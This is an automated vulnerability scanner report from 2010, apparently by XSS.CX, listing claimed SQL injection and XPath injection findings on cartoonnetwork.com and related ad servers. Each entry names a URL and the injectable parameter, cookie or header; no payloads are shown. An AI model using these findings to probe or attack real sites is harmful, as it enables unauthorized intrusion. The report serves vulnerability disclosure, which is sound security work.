cartoonnetwork.com, XSS, Cross Site Scripting, Example Report

CWE-113, CWE-79, CWE-89, CloudScan Vulnerability Crawler Report

Report generated by XSS.CX at Fri Dec 10 21:09:36 CST 2010.


Cross Site Scripting in Cartoonnetwork.com

Loading

1. SQL injection

1.1. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=472781&FlightID=345105&TargetID=105191&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4677,4960,11948,19419,24537,28173,31159,31774,32749,33852,36742,37272,37430,37605,37606,37607,37612,39847,40253,40617,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,66830,77699,107525,107666,88092,110999,105191,103340,105451,111147&Values=46,60,85,100,150,682,685,917,1063,1285,1678,1690,1735,1815,4450,38253,47118,47457,47781,47892,52263,52899,56058,56872,57005,57006,58702,61089,61263,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C7355535302921&random=caginve,bgqfzjgkorfyW [REST URL parameter 2]

1.2. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477777&FlightID=332167&TargetID=73794&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,19464,20750,24537,33852,37272,37430,40253,42274,42275,43109,43377,43752,44046,44047,44049,45046,45072&Targets=1515,75884,109020,109382,109428,109447,109572,109650,109724,109725,109730,73794,93466,50467,61988,107664,107652,111142&Values=46,60,85,100,150,1266,4450,47781,47818,50018,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=dfWwIxv,bgqfzgxkoqWpq [REST URL parameter 2]

1.3. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477790&FlightID=332166&TargetID=5468&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,5468,66830,107666,107651,88092,103340,105451,111147&Values=46,60,85,100,150,1266,4450,47781,47818,47892,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=cghdRtw,bgqfzgxkoqWpr [REST URL parameter 2]

1.4. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=478322&FlightID=347834&TargetID=79730&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302921&random=dmnurxk,bgqfzgxkoqWpj [REST URL parameter 2]

1.5. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage¶ms.styles=fs&tile=3795625302922&domId=97279 [User-Agent HTTP header]

1.6. http://ads.cnn.com/event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ [REST URL parameter 2]

1.7. http://ads.cnn.com/event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ [REST URL parameter 2]

1.8. http://ads.cnn.com/event.ng/Type=click&FlightID=332166&AdID=477790&TargetID=5468&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Values=47781&Redirect=[ewclickthru] [REST URL parameter 2]

1.9. http://ads.cnn.com/event.ng/Type=click&FlightID=347834&AdID=478322&TargetID=79730&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/ad.doubleclick.net/click [REST URL parameter 2]

1.10. http://ads.tbs.com/event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ [REST URL parameter 2]

1.11. http://ads.tbs.com/event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ [REST URL parameter 2]

1.12. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getAllEpisodes [networkName parameter]

1.13. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [filterByCollectionId parameter]

1.14. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [id parameter]

1.15. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [networkName parameter]

1.16. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByShow [networkName parameter]

1.17. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getFeaturedEpisode [networkName parameter]

1.18. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getMoreEpisodesLike [filterByCollectionId parameter]

1.19. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getMoreEpisodesLike [networkName parameter]

1.20. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByCategory [filterByCollectionId parameter]

1.21. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByCategory [id parameter]

1.22. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByCategory [networkName parameter]

1.23. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByShow [id parameter]

1.24. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByShow [networkName parameter]

2. XPath injection

2.1. http://ben10gamecreator.cartoonnetwork.com/index.html [REST URL parameter 1]

2.2. http://www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html [REST URL parameter 1]

2.3. http://www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html [REST URL parameter 2]

2.4. http://www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html [REST URL parameter 3]

2.5. http://www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html [REST URL parameter 4]

2.6. http://www.cartoonnetwork.com/.element/ssi/ads.iframes/eyewonder/interim.html [REST URL parameter 5]

2.7. http://www.cartoonnetwork.com/cnschedule/xmlServices/10.EST.xml [REST URL parameter 1]

2.8. http://www.cartoonnetwork.com/cnschedule/xmlServices/ScheduleServices [REST URL parameter 1]

2.9. http://www.cartoonnetwork.com/cnservice/cartoonsvc/content/xml/getContentById.do [REST URL parameter 1]

2.10. http://www.cartoonnetwork.com/cnservice/content/xml/getContentById.do [REST URL parameter 1]

2.11. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByCategory [REST URL parameter 1]

2.12. http://www.cartoonnetwork.com/cnvideosvc2/svc/episodeSearch/getEpisodesByShow [REST URL parameter 1]

2.13. http://www.cartoonnetwork.com/feedback/index.html [REST URL parameter 1]

2.14. http://www.cartoonnetwork.com/feedback/index.html [REST URL parameter 2]

2.15. http://www.cartoonnetwork.com/forums [1401316autoFreqCap cookie]

2.16. http://www.cartoonnetwork.com/forums [JSESSIONID cookie]

2.17. http://www.cartoonnetwork.com/forums [REST URL parameter 1]

2.18. http://www.cartoonnetwork.com/forums [Referer HTTP header]

2.19. http://www.cartoonnetwork.com/forums [User-Agent HTTP header]

2.20. http://www.cartoonnetwork.com/forums [adDEmas cookie]

2.21. http://www.cartoonnetwork.com/forums [adDEon cookie]

2.22. http://www.cartoonnetwork.com/forums [name of an arbitrarily supplied request parameter]

2.23. http://www.cartoonnetwork.com/forums [s_cc cookie]

2.24. http://www.cartoonnetwork.com/forums [s_sq cookie]

2.25. http://www.cartoonnetwork.com/forums [s_vi cookie]

2.26. http://www.cartoonnetwork.com/forums/Go [REST URL parameter 1]

2.27. http://www.cartoonnetwork.com/forums/javascript:searchToon() [REST URL parameter 1]

2.28. http://www.cartoonnetwork.com/forums/rss/rssmessages.jspa [REST URL parameter 1]

2.29. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [1401316autoFreqCap cookie]

2.30. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [JSESSIONID cookie]

2.31. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [REST URL parameter 1]

2.32. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [Referer HTTP header]

2.33. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [User-Agent HTTP header]

2.34. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [adDEmas cookie]

2.35. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [adDEon cookie]

2.36. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [name of an arbitrarily supplied request parameter]

2.37. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [route cookie]

2.38. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [s_cc cookie]

2.39. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [s_sq cookie]

2.40. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [s_vi cookie]

2.41. http://www.cartoonnetwork.com/freewheel/js/fwjslib_1.1.js [REST URL parameter 1]

2.42. http://www.cartoonnetwork.com/freewheel/js/fwjslib_1.1.js [REST URL parameter 2]

2.43. http://www.cartoonnetwork.com/freewheel/js/fwjslib_1.1.js [REST URL parameter 3]

2.44. http://www.cartoonnetwork.com/games/tools/js/main/FlexSpace_games.js [REST URL parameter 1]

2.45. http://www.cartoonnetwork.com/games/tools/js/main/FlexSpace_games.js [REST URL parameter 2]

2.46. http://www.cartoonnetwork.com/games/tools/js/main/FlexSpace_games.js [REST URL parameter 3]

2.47. http://www.cartoonnetwork.com/games/tools/js/main/FlexSpace_games.js [REST URL parameter 4]

2.48. http://www.cartoonnetwork.com/games/tools/js/main/FlexSpace_games.js [REST URL parameter 5]

2.49. http://www.cartoonnetwork.com/games/tools/js/main/datasets.js [REST URL parameter 1]

2.50. http://www.cartoonnetwork.com/games/tools/js/main/datasets.js [REST URL parameter 2]

2.51. http://www.cartoonnetwork.com/games/tools/js/main/datasets.js [REST URL parameter 3]

2.52. http://www.cartoonnetwork.com/games/tools/js/main/datasets.js [REST URL parameter 4]

2.53. http://www.cartoonnetwork.com/games/tools/js/main/datasets.js [REST URL parameter 5]

2.54. http://www.cartoonnetwork.com/games/tools/js/main/main.js [REST URL parameter 1]

2.55. http://www.cartoonnetwork.com/games/tools/js/main/main.js [REST URL parameter 2]

2.56. http://www.cartoonnetwork.com/games/tools/js/main/main.js [REST URL parameter 3]

2.57. http://www.cartoonnetwork.com/games/tools/js/main/main.js [REST URL parameter 4]

2.58. http://www.cartoonnetwork.com/games/tools/js/main/main.js [REST URL parameter 5]

2.59. http://www.cartoonnetwork.com/help/privacy.html [REST URL parameter 1]

2.60. http://www.cartoonnetwork.com/help/privacy.html [REST URL parameter 2]

2.61. http://www.cartoonnetwork.com/help/termsofuse.html [REST URL parameter 1]

2.62. http://www.cartoonnetwork.com/help/termsofuse.html [REST URL parameter 2]

2.63. http://www.cartoonnetwork.com/help/trademark.html [REST URL parameter 1]

2.64. http://www.cartoonnetwork.com/help/trademark.html [REST URL parameter 2]

2.65. http://www.cartoonnetwork.com/legal/international.html [REST URL parameter 1]

2.66. http://www.cartoonnetwork.com/legal/international.html [REST URL parameter 2]

2.67. http://www.cartoonnetwork.com/legal/parentguide.html [REST URL parameter 1]

2.68. http://www.cartoonnetwork.com/legal/parentguide.html [REST URL parameter 2]

2.69. http://www.cartoonnetwork.com/legal/privacy.html [REST URL parameter 1]

2.70. http://www.cartoonnetwork.com/legal/privacy.html [REST URL parameter 2]

2.71. http://www.cartoonnetwork.com/legal/ratings.html [REST URL parameter 1]

2.72. http://www.cartoonnetwork.com/legal/ratings.html [REST URL parameter 2]

2.73. http://www.cartoonnetwork.com/legal/termsofuse.html [REST URL parameter 1]

2.74. http://www.cartoonnetwork.com/legal/termsofuse.html [REST URL parameter 2]

2.75. http://www.cartoonnetwork.com/legal/trademark.html [REST URL parameter 1]

2.76. http://www.cartoonnetwork.com/legal/trademark.html [REST URL parameter 2]

2.77. http://www.cartoonnetwork.com/profiles/ [REST URL parameter 1]

2.78. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [1401316autoFreqCap cookie]

2.79. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [JSESSIONID cookie]

2.80. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [REST URL parameter 1]

2.81. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [REST URL parameter 2]

2.82. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [REST URL parameter 3]

2.83. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [REST URL parameter 4]

2.84. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [REST URL parameter 5]

2.85. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [Referer HTTP header]

2.86. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [User-Agent HTTP header]

2.87. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [adDEmas cookie]

2.88. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [adDEon cookie]

2.89. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [name of an arbitrarily supplied request parameter]

2.90. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [route cookie]

2.91. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [s_cc cookie]

2.92. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [s_sq cookie]

2.93. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [s_vi cookie]

2.94. http://www.cartoonnetwork.com/profiles/AchieveServices [REST URL parameter 1]

2.95. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [1401316autoFreqCap cookie]

2.96. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [JSESSIONID cookie]

2.97. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [REST URL parameter 1]

2.98. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [REST URL parameter 2]

2.99. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [REST URL parameter 3]

2.100. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [REST URL parameter 4]

2.101. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [REST URL parameter 5]

2.102. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [Referer HTTP header]

2.103. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [User-Agent HTTP header]

2.104. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [adDEmas cookie]

2.105. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [adDEon cookie]

2.106. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [name of an arbitrarily supplied request parameter]

2.107. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [route cookie]

2.108. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [s_cc cookie]

2.109. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [s_sq cookie]

2.110. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [s_vi cookie]

2.111. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [1401316autoFreqCap cookie]

2.112. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [JSESSIONID cookie]

2.113. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [REST URL parameter 1]

2.114. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [REST URL parameter 2]

2.115. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [REST URL parameter 3]

2.116. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [REST URL parameter 4]

2.117. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [REST URL parameter 5]

2.118. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [Referer HTTP header]

2.119. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [User-Agent HTTP header]

2.120. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [adDEmas cookie]

2.121. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [adDEon cookie]

2.122. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [name of an arbitrarily supplied request parameter]

2.123. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [route cookie]

2.124. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [s_cc cookie]

2.125. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [s_sq cookie]

2.126. http://www.cartoonnetwork.com/profiles/Active/Hector/Warrior/index.html [s_vi cookie]

2.127. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [1401316autoFreqCap cookie]

2.128. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [JSESSIONID cookie]

2.129. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [REST URL parameter 1]

2.130. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [REST URL parameter 2]

2.131. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [REST URL parameter 3]

2.132. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [REST URL parameter 4]

2.133. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [REST URL parameter 5]

2.134. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [Referer HTTP header]

2.135. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [User-Agent HTTP header]

2.136. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [adDEmas cookie]

2.137. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [adDEon cookie]

2.138. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [name of an arbitrarily supplied request parameter]

2.139. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [route cookie]

2.140. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [s_cc cookie]

2.141. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [s_sq cookie]

2.142. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [s_vi cookie]

2.143. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [1401316autoFreqCap cookie]

2.144. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [JSESSIONID cookie]

2.145. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [REST URL parameter 1]

2.146. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [REST URL parameter 2]

2.147. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [REST URL parameter 3]

2.148. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [REST URL parameter 4]

2.149. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [REST URL parameter 5]

2.150. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [Referer HTTP header]

2.151. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [User-Agent HTTP header]

2.152. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [adDEmas cookie]

2.153. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [adDEon cookie]

2.154. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [name of an arbitrarily supplied request parameter]

2.155. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [route cookie]

2.156. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [s_cc cookie]

2.157. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [s_sq cookie]

2.158. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [s_vi cookie]

2.159. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [1401316autoFreqCap cookie]

2.160. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [JSESSIONID cookie]

2.161. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [REST URL parameter 1]

2.162. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [REST URL parameter 2]

2.163. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [REST URL parameter 3]

2.164. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [REST URL parameter 4]

2.165. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [REST URL parameter 5]

2.166. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [Referer HTTP header]

2.167. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [User-Agent HTTP header]

2.168. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [adDEmas cookie]

2.169. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [adDEon cookie]

2.170. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [name of an arbitrarily supplied request parameter]

2.171. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [route cookie]

2.172. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [s_cc cookie]

2.173. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [s_sq cookie]

2.174. http://www.cartoonnetwork.com/profiles/Ancient/Joey/Swarm/index.html [s_vi cookie]

2.175. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [1401316autoFreqCap cookie]

2.176. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [JSESSIONID cookie]

2.177. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [REST URL parameter 1]

2.178. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [REST URL parameter 2]

2.179. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [REST URL parameter 3]

2.180. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [REST URL parameter 4]

2.181. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [REST URL parameter 5]

2.182. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [Referer HTTP header]

2.183. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [User-Agent HTTP header]

2.184. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [adDEmas cookie]

2.185. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [adDEon cookie]

2.186. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [name of an arbitrarily supplied request parameter]

2.187. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [route cookie]

2.188. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [s_cc cookie]

2.189. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [s_sq cookie]

2.190. http://www.cartoonnetwork.com/profiles/Artful/Joseph/Soldier/index.html [s_vi cookie]

2.191. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [1401316autoFreqCap cookie]

2.192. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [JSESSIONID cookie]

2.193. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [REST URL parameter 1]

2.194. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [REST URL parameter 2]

2.195. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [REST URL parameter 3]

2.196. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [REST URL parameter 4]

2.197. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [REST URL parameter 5]

2.198. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [Referer HTTP header]

2.199. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [User-Agent HTTP header]

2.200. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [adDEmas cookie]

2.201. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [adDEon cookie]

2.202. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [name of an arbitrarily supplied request parameter]

2.203. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [route cookie]

2.204. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [s_cc cookie]

2.205. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [s_sq cookie]

2.206. http://www.cartoonnetwork.com/profiles/Artistic/Taylor/Thorax/index.html [s_vi cookie]

2.207. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [1401316autoFreqCap cookie]

2.208. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [JSESSIONID cookie]

2.209. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [REST URL parameter 1]

2.210. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [REST URL parameter 2]

2.211. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [REST URL parameter 3]

2.212. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [REST URL parameter 4]

2.213. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [REST URL parameter 5]

2.214. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [Referer HTTP header]

2.215. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [User-Agent HTTP header]

2.216. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [adDEmas cookie]

2.217. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [adDEon cookie]

2.218. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [name of an arbitrarily supplied request parameter]

2.219. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [route cookie]

2.220. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [s_cc cookie]

2.221. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [s_sq cookie]

2.222. http://www.cartoonnetwork.com/profiles/Bashful/Calvin/Buckaroo/index.html [s_vi cookie]

2.223. http://www.cartoonnetwork.com/profiles/Beastly/Zelda/Bolt/index.html [1401316autoFreqCap cookie]

2.224. http://www.cartoonnetwork.com/profiles/Beastly/Zelda/Bolt/index.html [JSESSIONID cookie]

2.225. http://www.cartoonnetwork.com/profiles/Beastly/Zelda/Bolt/index.html [REST URL parameter 1]

2.226. http://www.cartoonnetwork.com/profiles/Beastly/Zelda/Bolt/index.html [REST URL parameter 2]

2.227. http://www.cartoonnetwork.com/profiles/Beastly/Zelda/Bolt/index.html [REST URL parameter 3]

